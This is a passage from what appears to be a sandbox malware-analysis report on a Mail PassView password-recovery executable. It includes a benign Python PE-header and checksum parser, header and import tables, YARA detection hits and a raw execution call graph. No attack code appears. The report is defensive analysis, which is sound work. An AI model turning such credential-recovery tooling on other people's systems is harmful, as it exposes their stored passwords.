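The stub above reads the process's own PE headers: after calling an import with a NULL argument it checks for "MZ" (0x5A4D) at the returned base, follows e_lfanew ([eax+3Ch]) to "PE\0\0" (0x4550), reads the optional-header magic (0x10B for PE32, 0x20B for PE32+), and then, only if NumberOfRvaAndSizes ([ecx+74h] for PE32, [ecx+84h] for PE32+) exceeds 14, tests whether data directory 14 ([ecx+E8h] or [ecx+F8h]), the CLR/COM descriptor, is non-zero. Those offsets match the Visual C++ 2005 C runtime's startup check for a managed image; that reading is mine, the report itself does not name the function. The data directory table further down shows IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR as 0x0, so the check yields "not managed" for this file. The Python below is an added example, not code from the report or from NirSoft: it performs the same header walk and also recomputes the PE checksum, which is how the "real checksum: 0x20c22 should be: 0x1c68c" line in the signature section is produced. The minimal PE32 header it builds for demonstration is constructed, not a loadable image; pass a real file path to check an actual binary.

```python
"""Walk a PE header the way the entry-point stub above does, and recompute
the PE checksum to reproduce the "real checksum / should be" comparison.

Added example (not code from the Joe Sandbox report or from NirSoft).
Offsets are from the PE/COFF specification; the constructed header used in
main() is a stand-in for a real file, not a loadable image."""
import struct
import sys

IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14


def pe_checksum(data, checksum_offset):
    """CheckSumMappedFile-style sum: 16-bit words with end-around carry over the
    whole file, skipping the 4-byte CheckSum field, plus the file length."""
    file_len = len(data)
    if file_len % 2:
        data = data + b"\0"                 # pad an odd trailing byte
    total = 0
    for off in range(0, len(data), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue                        # the field itself is excluded from the sum
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total + file_len) & 0xFFFFFFFF


def parse_pe(data):
    """Return the fields the stub examines plus the stored and recomputed checksum."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                 # IMAGE_OPTIONAL_HEADER follows the 20-byte file header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC:      # PE32: [pe+0x74] and [pe+0xE8] in the stub
        rva_count_off, dir_off = opt + 0x5C, opt + 0x60
    elif magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC:    # PE32+: [pe+0x84] and [pe+0xF8]
        rva_count_off, dir_off = opt + 0x6C, opt + 0x70
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    checksum_off = opt + 0x40               # same offset in both optional-header layouts
    n_dirs = struct.unpack_from("<I", data, rva_count_off)[0]
    com_rva = 0
    if n_dirs > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR:   # the stub's "cmp ..., 0Eh / jbe" guard
        com_rva = struct.unpack_from("<I", data, dir_off + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR)[0]
    return {
        "magic": magic,
        "number_of_rva_and_sizes": n_dirs,
        "is_managed": com_rva != 0,         # the value the stub leaves in [ebp-1Ch]
        "stored_checksum": struct.unpack_from("<I", data, checksum_off)[0],
        "computed_checksum": pe_checksum(data, checksum_off),
    }


def build_minimal_pe32(stored_checksum=0, n_dirs=16, com_rva=0):
    """Constructed 312-byte header-only PE32 image for demonstration only."""
    e_lfanew = 0x40
    opt = e_lfanew + 4 + 20
    buf = bytearray(opt + 0xE0)             # a PE32 optional header is 0xE0 bytes
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<H", buf, opt, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", buf, opt + 0x40, stored_checksum)
    struct.pack_into("<I", buf, opt + 0x5C, n_dirs)
    struct.pack_into("<I", buf, opt + 0x60 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, com_rva)
    return bytes(buf)


if __name__ == "__main__":
    # Pass a real file path to check it; otherwise use the constructed header.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe32(stored_checksum=0x1234)
    info = parse_pe(data)
    for key, value in info.items():
        print("%-24s %s" % (key, hex(value) if not isinstance(value, bool) else value))
    print("checksum matches:", info["stored_checksum"] == info["computed_checksum"])
```

A checksum mismatch like the one the report flags is weak evidence on its own: the loader ignores the field for ordinary executables (it is enforced only for drivers and a few system images), and builds that never set it, or that were patched after linking, fail the comparison without anything malicious having happened. It earns its place as a pivot, since a binary whose stored checksum matches a known-good build but whose computed one does not has been altered after the fact.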
                Programming Language:
                • [RES] VS2005 build 50727
                • [LNK] VS2005 build 50727
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1562c | 0xdc | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x2ec4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x133c0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x13000 | 0x398 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x11444 | 0x11600 | 075a4752015d3334d0e8004026c943e9 | False | 0.5987100944244604 | data | 6.423545208891307 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x13000 | 0x3896 | 0x3a00 | c7abfcb7a14066602a9e29aaaceb2ab9 | False | 0.4829606681034483 | data | 5.677342764808712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x17000 | 0x1b74 | 0xc00 | 32fceda92d9d037d5e69161d18111910 | False | 0.3046875 | data | 2.6959048209292744 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x19000 | 0x2ec4 | 0x3000 | bc52b2709d30b43e91549b48a175bc0e | False | 0.337158203125 | data | 4.213718411764263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                RT_CURSOR | 0x196b8 | 0x134 | data | English | United States | 0.40584415584415584
                RT_BITMAP | 0x197ec | 0x3e8 | Device independent bitmap graphic, 112 x 16 x 4, image size 896 | Hebrew | Israel | 0.466
                RT_BITMAP | 0x19bd4 | 0xd8 | Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/m | English | United States | 0.4305555555555556
                RT_BITMAP | 0x19cac | 0xd8 | Device independent bitmap graphic, 14 x 14 x 4, image size 112, resolution 3780 x 3780 px/m | English | United States | 0.42592592592592593
                RT_ICON | 0x19d84 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Hebrew | Israel | 0.38306451612903225
                RT_ICON | 0x1a06c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Hebrew | Israel | 0.5641891891891891
                RT_ICON | 0x1a194 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Hebrew | Israel | 0.3885135135135135
                RT_MENU | 0x1a2bc | 0x38c | data | English | United States | 0.42731277533039647
                RT_MENU | 0x1a648 | 0x1f2 | data | English | United States | 0.44377510040160645
                RT_DIALOG | 0x1a83c | 0xa2 | data | Hebrew | Israel | 0.7592592592592593
                RT_DIALOG | 0x1a8e0 | 0x296 | data | Hebrew | Israel | 0.48942598187311176
                RT_DIALOG | 0x1ab78 | 0x364 | data | Hebrew | Israel | 0.3847926267281106
                RT_DIALOG | 0x1aedc | 0xfa | data | Hebrew | Israel | 0.616
                RT_DIALOG | 0x1afd8 | 0x336 | data | English | United States | 0.49635036496350365
                RT_STRING | 0x1b310 | 0x1f2 | data | English | United States | 0.4718875502008032
                RT_STRING | 0x1b504 | 0x24 | data | English | United States | 0.4166666666666667
                RT_STRING | 0x1b528 | 0x13a | data | English | United States | 0.4745222929936306
                RT_STRING | 0x1b664 | 0x3e | Matlab v4 mat-file (little endian) E, numeric, rows 0, columns 0 | English | United States | 0.6774193548387096
                RT_STRING | 0x1b6a4 | 0x48 | data | English | United States | 0.625
                RT_STRING | 0x1b6ec | 0x134 | data | English | United States | 0.5584415584415584
                RT_STRING | 0x1b820 | 0xa6 | data | English | United States | 0.5602409638554217
                RT_STRING | 0x1b8c8 | 0x74 | Matlab v4 mat-file (little endian) N, numeric, rows 0, columns 0 | English | United States | 0.75
                RT_STRING | 0x1b93c | 0xaa | data | English | United States | 0.5470588235294118
                RT_STRING | 0x1b9e8 | 0x68 | data | English | United States | 0.6153846153846154
                RT_ACCELERATOR | 0x1ba50 | 0x50 | data | Hebrew | Israel | 0.825
                RT_GROUP_CURSOR | 0x1baa0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
                RT_GROUP_ICON | 0x1bab4 | 0x22 | data | Hebrew | Israel | 1.0294117647058822
                RT_GROUP_ICON | 0x1bad8 | 0x14 | data | Hebrew | Israel | 1.15
                RT_VERSION | 0x1baec | 0x26c | data | Hebrew | Israel | 0.5193548387096775
                RT_MANIFEST | 0x1bd58 | 0x16a | ASCII text, with CRLF line terminators | English | United States | 0.649171270718232
                DLL | Import
                msvcrt.dll | memmove, wcschr, wcslen, wcsncmp, _itoa, _strlwr, qsort, strncmp, _snprintf, _mbsrchr, _mbsnbicmp, __dllonexit, _onexit, _c_exit, _exit, _XcptFilter, _cexit, _strnicmp, _acmdln, __getmainargs, _initterm, _memicmp, malloc, strrchr, _stricmp, free, modf, memcmp, strtoul, ??3@YAXPAX@Z, ??2@YAPAXI@Z, memcpy, sprintf, _mbsicmp, atoi, _strcmpi, strlen, strcmp, exit, _adjust_fdiv, wcsstr, log, _mbscmp, strchr, _purecall, strncat, abs, strcat, _ultoa, strcpy, memset, __p__commode, __p__fmode, __set_app_type, _controlfp, _except_handler3, __setusermatherr
                COMCTL32.dll | CreateToolbarEx, ImageList_Create, ImageList_AddMasked, ImageList_SetImageCount, ImageList_ReplaceIcon
                RPCRT4.dll | UuidFromStringA
                KERNEL32.dll | GetCurrentDirectoryA, GetModuleHandleA, SetCurrentDirectoryA, GetCurrentProcess, ExitProcess, GetCurrentProcessId, ReadProcessMemory, OpenProcess, GetStdHandle, GetPrivateProfileIntA, EnumResourceNamesA, WritePrivateProfileStringA, GetComputerNameA, GetFileSize, CreateFileA, GlobalUnlock, GlobalLock, GetTempPathA, GlobalAlloc, CloseHandle, FindResourceA, LoadResource, EnumResourceTypesA, SizeofResource, LockResource, DeleteFileA, GetStartupInfoA, GetPrivateProfileStringA, MultiByteToWideChar, WideCharToMultiByte, ExpandEnvironmentStringsA, LocalFree, WriteFile, GetPrivateProfileSectionA, FreeLibrary, GetProcAddress, LoadLibraryA, GetModuleFileNameA, FindFirstFileA, FindNextFileA, SetFilePointer, GetLastError, LoadLibraryExA, GetFileAttributesA, GetTempFileNameA, FindClose, FormatMessageA, GetWindowsDirectoryA, ReadFile, GetVersionExA
                USER32.dll | GetClassNameA, GetMessageA, TranslateMessage, RegisterWindowMessageA, PostQuitMessage, TrackPopupMenu, PostMessageA, GetFocus, DispatchMessageA, DrawTextExA, IsDialogMessageA, GetWindowTextA, GetMenuItemInfoA, EnumChildWindows, DestroyMenu, GetDlgCtrlID, DialogBoxParamA, ShowWindow, SetCursor, LoadCursorA, ChildWindowFromPoint, GetSysColorBrush, EndDialog, GetDlgItem, CreateWindowExA, InvalidateRect, SetDlgItemInt, BeginPaint, GetClientRect, GetWindow, SetDlgItemTextA, DrawFrameControl, GetDlgItemTextA, SendDlgItemMessageA, SetWindowTextA, GetWindowRect, GetSystemMetrics, GetDlgItemInt, DeferWindowPos, EndPaint, DefWindowProcA, TranslateAcceleratorA, MessageBoxA, GetWindowPlacement, RegisterClassA, UpdateWindow, SetMenu, LoadAcceleratorsA, SetWindowPos, SendMessageA, LoadIconA, GetWindowLongA, SetWindowLongA, SetFocus, BeginDeferWindowPos, EndDeferWindowPos, CheckMenuItem, GetMenuItemCount, SetClipboardData, GetMenuStringA, EnableWindow, DestroyWindow, GetCursorPos, LoadImageA, GetSysColor, MapWindowPoints, GetMenu, CloseClipboard, GetParent, OpenClipboard, GetDC, EmptyClipboard, MoveWindow, GetSubMenu, EnableMenuItem, ReleaseDC, LoadMenuA, LoadStringA, CreateDialogParamA, ModifyMenuA
                GDI32.dll | GetDeviceCaps, SetTextColor, CreateFontIndirectA, SetBkMode, DeleteObject, GetTextExtentPoint32A, SetBkColor, SelectObject
                comdlg32.dll | GetOpenFileNameA, GetSaveFileNameA, FindTextA
                ADVAPI32.dll | RegEnumKeyA, RegEnumKeyExA, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, GetUserNameA, RegCloseKey
                SHELL32.dll | SHBrowseForFolderA, SHGetPathFromIDListA, SHGetMalloc, ShellExecuteA
                ole32.dll | CoInitialize, CoTaskMemFree, CoUninitialize
                Language of compilation system | Country where language is spoken | Map
                English | United States |
                Hebrew | Israel |
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                May 23, 2024 01:32:18.235605955 CEST | 53 | 64857 | 162.159.36.2 | 192.168.2.9
                May 23, 2024 01:32:18.930286884 CEST | 53 | 57889 | 1.1.1.1 | 192.168.2.9

                Target ID: 0
                Start time: 19:31:31
                Start date: 22/05/2024
                Path: C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe
                Wow64 process (32bit): true
                Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.PUA.Tool.PassView.1835.14688.26789.exe"
                Imagebase: 0x400000
                File size: 102'400 bytes
                MD5 hash: A878DD0345C3721D93791AB68FCC1FAF
                Has elevated privileges: true
                Has administrator privileges: true
                Programmed in: C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000000.1536326687.0000000000413000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.2791709876.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation: low
                Has exited: false

                  Execution Graph

                  Execution Coverage: 14.9%
                  Dynamic/Decrypted Code Coverage: 0%
                  Signature Coverage: 7.5%
                  Total number of Nodes: 1808
                  Total number of Limit Nodes: 59
                  execution_graph 6357 40174e 6358 40175a 6357->6358 6359 40177a 6358->6359 6413 4070d9 6358->6413 6361 401790 6359->6361 6362 4017ee DefWindowProcA 6359->6362 6366 40a632 SendMessageA 6361->6366 6377 40b656 6361->6377 6363 4017a7 6362->6363 6418 405e36 LoadCursorA SetCursor 6366->6418 6368 40a656 SendMessageA 6373 40ef05 FreeLibrary 6368->6373 6376 4047fb FreeLibrary 6368->6376 6419 4047aa 6368->6419 6427 403c17 6368->6427 6503 40f1b0 RegOpenKeyExA 6368->6503 6369 40a67f 6504 40a5a1 6369->6504 6373->6369 6376->6369 6378 40b7a1 6377->6378 6379 40b671 6377->6379 6380 40b7f1 6378->6380 6381 40b7aa 6378->6381 6382 40b793 6379->6382 6383 40b677 6379->6383 6385 40a632 466 API calls 6380->6385 6384 40b7ad 6381->6384 6407 40b7c0 6381->6407 6386 40a5a1 19 API calls 6382->6386 6387 40b680 6383->6387 6388 40b769 6383->6388 6391 40b7b2 SetFocus 6384->6391 6411 40b6b3 6384->6411 6394 40b79f 6385->6394 6386->6394 6389 40b689 6387->6389 6390 40b73d 6387->6390 6392 40b770 PostMessageA 6388->6392 6393 40b785 GetFocus 6388->6393 6396 40b6b8 6389->6396 6401 40b68e 6389->6401 6397 40b74c LoadCursorA SetCursor 6390->6397 6390->6411 6391->6411 6392->6411 6393->6411 7726 40a3e9 6394->7726 6395 40b837 7715 401939 6395->7715 6403 40b6ca SetBkMode SetTextColor SelectObject DrawTextExA SelectObject 6396->6403 6396->6411 6404 40b845 6397->6404 6399 40b818 7772 409ee8 6399->7772 6400 40b81f 6400->6395 6406 40b824 SetFocus 6400->6406 6401->6411 7721 40b48c GetCursorPos GetSubMenu 6401->7721 6403->6411 6404->6363 6406->6395 6410 40a5a1 19 API calls 6407->6410 6412 40b7dd SetFocus 6410->6412 6411->6395 6411->6399 6411->6400 6412->6394 6414 4070e3 6413->6414 6415 4070f4 ??2@YAPAXI memset memcpy 6413->6415 6414->6415 6417 40713e 6414->6417 6416 407137 ??3@YAXPAX 6415->6416 6415->6417 6416->6417 6417->6359 6418->6368 6420 4047fb FreeLibrary 6419->6420 6421 4047b1 LoadLibraryA 6420->6421 6422 4047c2 GetProcAddress 6421->6422 6423 4047e4 6421->6423 6422->6423 6424 4047da 6422->6424 
6425 4047f7 6423->6425 6426 4047fb FreeLibrary 6423->6426 6424->6423 6425->6369 6426->6425 6428 40ef05 FreeLibrary 6427->6428 6429 403c31 LoadLibraryA 6428->6429 6430 403c75 6429->6430 6431 403c45 GetProcAddress 6429->6431 6433 40ef05 FreeLibrary 6430->6433 6431->6430 6432 403c5f 6431->6432 6432->6430 6436 403c6c 6432->6436 6434 403c7c 6433->6434 6435 4047aa 3 API calls 6434->6435 6437 403c87 6435->6437 6436->6434 6516 4036a6 6437->6516 6440 4036a6 27 API calls 6441 403c9b 6440->6441 6442 4036a6 27 API calls 6441->6442 6443 403ca5 6442->6443 6444 4036a6 27 API calls 6443->6444 6445 403caf 6444->6445 6528 4076b7 6445->6528 6453 403ce6 6454 403cf8 6453->6454 6707 402b92 memset 6453->6707 6574 40f1b0 RegOpenKeyExA 6454->6574 6457 403d0b 6458 403d1d 6457->6458 6459 402b92 37 API calls 6457->6459 6575 402c1e 6458->6575 6459->6458 6462 406282 GetVersionExA 6463 403d32 6462->6463 6593 40f1b0 RegOpenKeyExA 6463->6593 6465 403d52 6466 403d62 6465->6466 6715 402ae3 memset 6465->6715 6594 40f1b0 RegOpenKeyExA 6466->6594 6469 403d88 6470 403d98 6469->6470 6471 402ae3 44 API calls 6469->6471 6595 40f1b0 RegOpenKeyExA 6470->6595 6471->6470 6473 403dbe 6474 403dce 6473->6474 6475 402ae3 44 API calls 6473->6475 6476 40ef1c FreeLibrary 6474->6476 6475->6474 6477 403dde 6476->6477 6478 4047fb FreeLibrary 6477->6478 6479 403de9 6478->6479 6596 402f9c 6479->6596 6482 402f9c 34 API calls 6483 403e01 6482->6483 6612 403278 6483->6612 6492 403e3c 6494 403e74 6492->6494 6495 403e47 strcpy 6492->6495 6661 40e057 6494->6661 6496 40d9d8 187 API calls 6495->6496 6496->6494 6503->6369 7676 4087b1 6504->7676 6511 40a60c 6513 40a630 SetCursor SetFocus SendMessageA 6511->6513 6514 40a616 SendMessageA 6511->6514 6512 407a69 12 API calls 6515 40a5e9 sprintf strcat 6512->6515 6513->6363 6514->6513 6515->6511 6517 4036bc 6516->6517 6520 403786 6516->6520 6736 40ef77 UuidFromStringA UuidFromStringA 6517->6736 6520->6440 6521 4036d7 strchr 6521->6520 6522 4036f1 6521->6522 6740 402197 6522->6740 6525 
403765 strcpy 6743 4023c6 _mbscmp 6525->6743 6526 40374a sprintf 6526->6525 6529 4076c7 6528->6529 6780 4073b6 11 API calls 6529->6780 6533 4076e5 6534 4076f0 memset 6533->6534 6535 403cbb 6533->6535 6783 40f276 RegEnumKeyExA 6534->6783 6546 407306 6535->6546 6537 4077b7 RegCloseKey 6537->6535 6539 40771c 6539->6537 6540 407741 memset 6539->6540 6784 40f1b0 RegOpenKeyExA 6539->6784 6801 40f276 RegEnumKeyExA 6539->6801 6785 40f1f1 RegQueryValueExA 6540->6785 6543 407779 6786 407570 strlen 6543->6786 6803 40f1b0 RegOpenKeyExA 6546->6803 6548 407328 6549 403cc7 6548->6549 6550 40732f memset 6548->6550 6558 4077c5 6549->6558 6804 40f276 RegEnumKeyExA 6550->6804 6552 4073a8 RegCloseKey 6552->6549 6554 407358 6554->6552 6805 40f1b0 RegOpenKeyExA 6554->6805 6806 4071d6 memset 6554->6806 6822 40f276 RegEnumKeyExA 6554->6822 6827 404651 6558->6827 6563 40781c wcslen 6564 4079cd 6563->6564 6570 40784f 6563->6570 6835 4046cc 6564->6835 6565 407859 wcsncmp 6565->6570 6567 4047aa 3 API calls 6567->6570 6568 4047fb FreeLibrary 6568->6570 6569 4078f1 memset 6569->6570 6571 40791e memcpy wcschr 6569->6571 6570->6564 6570->6565 6570->6567 6570->6568 6570->6569 6570->6571 6572 4079a1 LocalFree 6570->6572 6838 4046e1 strcpy 6570->6838 6571->6570 6572->6570 6573 40f1b0 RegOpenKeyExA 6573->6453 6574->6457 6839 40f1b0 RegOpenKeyExA 6575->6839 6577 402c3b 6578 402d66 6577->6578 6579 402c48 memset 6577->6579 6578->6462 6840 40f276 RegEnumKeyExA 6579->6840 6581 402d5d RegCloseKey 6581->6578 6582 40f232 3 API calls 6583 402ca5 memset sprintf 6582->6583 6841 40f1b0 RegOpenKeyExA 6583->6841 6585 402ce9 6586 402cfb sprintf 6585->6586 6587 402b92 37 API calls 6585->6587 6842 40f1b0 RegOpenKeyExA 6586->6842 6587->6586 6589 402c73 6589->6581 6589->6582 6590 402b92 37 API calls 6589->6590 6592 402d5b 6589->6592 6843 40f276 RegEnumKeyExA 6589->6843 6590->6589 6592->6581 6593->6465 6594->6469 6595->6473 6844 40f1b0 RegOpenKeyExA 6596->6844 6598 402fba 6599 402fc7 memset 6598->6599 6600 4030ed 
6598->6600 6845 40f276 RegEnumKeyExA 6599->6845 6600->6482 6602 4030e3 RegCloseKey 6602->6600 6603 40f232 3 API calls 6604 403019 memset sprintf 6603->6604 6846 40f1b0 RegOpenKeyExA 6604->6846 6606 403063 memset 6847 40f276 RegEnumKeyExA 6606->6847 6607 40f276 RegEnumKeyExA 6611 402ff4 6607->6611 6609 4030ba RegCloseKey 6609->6611 6611->6602 6611->6603 6611->6606 6611->6607 6611->6609 6848 402d74 6611->6848 6613 403296 6612->6613 6614 40336a 6612->6614 6615 402197 memset 6613->6615 6627 4034a5 memset memset 6614->6627 6616 4032a2 6615->6616 6900 403127 6616->6900 6619 4032b9 memset GetPrivateProfileSectionA 6619->6614 6621 4032f0 6619->6621 6620 4023c6 16 API calls 6620->6619 6621->6614 6622 40335c strlen 6621->6622 6623 402197 memset 6621->6623 6625 403127 5 API calls 6621->6625 6626 4023c6 16 API calls 6621->6626 6622->6614 6622->6621 6624 403311 strchr 6623->6624 6624->6621 6625->6621 6626->6621 6628 40f232 3 API calls 6627->6628 6629 403500 6628->6629 6630 403540 6629->6630 6631 403507 strcpy 6629->6631 6635 403946 6630->6635 6632 405f29 2 API calls 6631->6632 6633 403526 strcat 6632->6633 6926 4033b1 6633->6926 6959 4046e1 strcpy 6635->6959 6637 40398e RegOpenKeyExA 6639 40396c 6637->6639 6638 4039c0 RegOpenKeyExA 6638->6639 6639->6637 6639->6638 6643 403a04 6639->6643 6960 40dc39 6639->6960 6976 40db04 RegQueryValueExA 6639->6976 6991 4038a9 6639->6991 6644 4047fb FreeLibrary 6643->6644 6645 403a10 6644->6645 6646 40378b memset memset 6645->6646 7008 411622 memset 6646->7008 6649 4038a3 6649->6492 6724 40d9d8 6649->6724 6650 402197 memset 6651 4037ef 6650->6651 6652 4060da 2 API calls 6651->6652 6653 403804 6652->6653 6654 4060da 2 API calls 6653->6654 6655 403816 strchr 6654->6655 6656 403845 strcpy 6655->6656 6657 403858 strlen 6655->6657 6658 403880 strcpy 6656->6658 6657->6658 6659 403865 sprintf 6657->6659 6660 4023c6 16 API calls 6658->6660 6659->6658 6660->6649 6662 412360 6661->6662 6663 40e067 RegOpenKeyExA 6662->6663 6664 40e092 RegOpenKeyExA 
6663->6664 6665 403e80 6663->6665 6666 40e184 RegCloseKey 6664->6666 6667 40e0ac RegQueryValueExA 6664->6667 6675 40dec3 6665->6675 6666->6665 6668 40e17a RegCloseKey 6667->6668 6669 40e0db 6667->6669 6668->6666 6670 4047aa 3 API calls 6669->6670 6671 40e0e8 6670->6671 6671->6668 6672 40e170 LocalFree 6671->6672 6673 40e134 memcpy memcpy 6671->6673 6672->6668 7095 40dd59 6673->7095 6676 406282 GetVersionExA 6675->6676 6677 40dee4 6676->6677 6678 404651 7 API calls 6677->6678 6685 40df00 6678->6685 6679 4046cc FreeLibrary 6680 403e86 6679->6680 6687 4113c4 memset 6680->6687 6681 40e03d 6681->6679 6682 40df6a memset WideCharToMultiByte 6683 40df9a _strnicmp 6682->6683 6682->6685 6684 40dfb2 WideCharToMultiByte 6683->6684 6683->6685 6684->6685 6686 40dfdf WideCharToMultiByte 6684->6686 6685->6681 6685->6682 6686->6685 6688 40f4ca 10 API calls 6687->6688 6689 411403 6688->6689 7109 406763 strlen strlen 6689->7109 6694 40f4ca 10 API calls 6695 41142a 6694->6695 6696 406763 3 API calls 6695->6696 6697 411434 6696->6697 6698 4112ec 65 API calls 6697->6698 6699 411440 memset memset 6698->6699 6700 40f232 3 API calls 6699->6700 6701 411493 ExpandEnvironmentStringsA strlen 6700->6701 6702 4114ce _stricmp 6701->6702 6703 4114bf 6701->6703 6704 403e92 6702->6704 6705 4114e6 6702->6705 6703->6702 6704->6369 6706 4112ec 65 API calls 6705->6706 6706->6704 7239 40f276 RegEnumKeyExA 6707->7239 6709 402c14 RegCloseKey 6709->6454 6711 402bc6 6711->6709 7240 40f1b0 RegOpenKeyExA 6711->7240 7241 4025c5 6711->7241 7255 40f276 RegEnumKeyExA 6711->7255 7278 40f276 RegEnumKeyExA 6715->7278 6717 402b7c RegCloseKey 6717->6466 6718 4060da 2 API calls 6719 402b19 6718->6719 6719->6717 6719->6718 6723 402b79 6719->6723 7279 40f1b0 RegOpenKeyExA 6719->7279 7280 402a5e memset 6719->7280 7288 40f276 RegEnumKeyExA 6719->7288 6723->6717 6725 406fd2 9 API calls 6724->6725 6733 40da11 6725->6733 6726 40702d 9 API calls 6726->6733 6727 40da83 6729 4070c5 FindClose 6727->6729 6728 406f97 2 API calls 
6728->6733 6730 40da8c 6729->6730 6730->6492 6731 40d9d8 186 API calls 6731->6733 6732 40da3d _stricmp 6732->6733 6733->6726 6733->6727 6733->6728 6733->6731 6733->6732 7323 406155 GetFileAttributesA 6733->7323 7324 40d7c1 6733->7324 6737 4036cf 6736->6737 6738 40efa1 6736->6738 6737->6520 6737->6521 6738->6737 6739 40efd2 memcpy CoTaskMemFree 6738->6739 6739->6737 6750 406578 memset 6740->6750 6742 4021a8 strcpy strcpy strlen 6742->6525 6742->6526 6744 4023f1 6743->6744 6748 4023e5 6743->6748 6751 401a0f strlen 6744->6751 6763 4090d6 6748->6763 6750->6742 6752 401bab 6751->6752 6759 401a63 6751->6759 6753 401bf8 log log 6752->6753 6754 401c3e 6752->6754 6755 401c30 free 6753->6755 6756 401c3a _mbsicmp 6753->6756 6754->6756 6757 401c44 free 6754->6757 6755->6756 6756->6748 6757->6756 6759->6752 6760 401b10 abs 6759->6760 6761 4045f2 4 API calls 6759->6761 6774 4045f2 6759->6774 6760->6759 6762 401b46 abs 6761->6762 6762->6759 6764 4090e3 6763->6764 6765 4090fe 6763->6765 6764->6765 6766 40912b memcpy 6764->6766 6767 409122 free 6765->6767 6768 409147 6765->6768 6772 402424 6766->6772 6771 409157 memcpy 6767->6771 6770 406104 3 API calls 6768->6770 6770->6771 6771->6772 6772->6520 6775 40461b 6774->6775 6776 4045fd 6774->6776 6775->6759 6777 404605 free 6776->6777 6778 40460e 6776->6778 6777->6775 6779 406104 3 API calls 6778->6779 6779->6775 6781 407501 6780->6781 6782 40f1b0 RegOpenKeyExA 6781->6782 6782->6533 6783->6539 6784->6539 6785->6543 6787 40758e 6786->6787 6788 4076b0 RegCloseKey 6787->6788 6789 4075a2 memset 6787->6789 6788->6539 6790 4075d3 6789->6790 6802 4046e1 strcpy 6790->6802 6792 407610 6793 4047aa 3 API calls 6792->6793 6794 407615 6793->6794 6795 4076a5 6794->6795 6797 40765b memcpy 6794->6797 6796 4047fb FreeLibrary 6795->6796 6796->6788 6798 4060da 2 API calls 6797->6798 6799 40768f LocalFree 6798->6799 6799->6795 6801->6539 6802->6792 6803->6548 6804->6554 6805->6554 6823 40f214 RegQueryValueExA 6806->6823 6808 407233 6809 4072ff RegCloseKey 
